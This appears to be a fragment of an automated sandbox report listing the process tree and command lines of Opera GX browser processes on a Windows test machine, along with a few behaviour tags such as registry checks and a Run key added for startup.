C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1b8,0x1bc,0x1c0,0x1b4,0x1c4,0x7ff9741261d0,0x7ff9741261e0,0x7ff9741261f03⤵PID:5392
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --ran-launcher --started-from-shortcut --lowered-browser1⤵
- Adds Run key to start application
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:5888 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1c4,0x1c8,0x1cc,0x1c0,0x44,0x7ff9741261d0,0x7ff9741261e0,0x7ff9741261f02⤵PID:4756
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1780,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=1776 /prefetch:22⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=1696,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:32⤵PID:1588
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2076,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:82⤵PID:6924
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2656,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=2960 /prefetch:82⤵PID:7104
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2664,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=2984 /prefetch:82⤵PID:7096
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2672,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3104 /prefetch:82⤵PID:7128
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2680,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3352 /prefetch:82⤵PID:7164
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2688,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3380 /prefetch:82⤵PID:3780
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3632,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:12⤵PID:2588
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3640,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3780 /prefetch:22⤵PID:4140
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4680,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=4704 /prefetch:12⤵
- Checks computer location settings
PID:1600
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4836,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:12⤵PID:3504
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5104,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5128 /prefetch:22⤵PID:1280
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=5500,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:22⤵PID:7812
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=4528,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5592 /prefetch:82⤵PID:7804
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5796,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:22⤵PID:7732
-
-
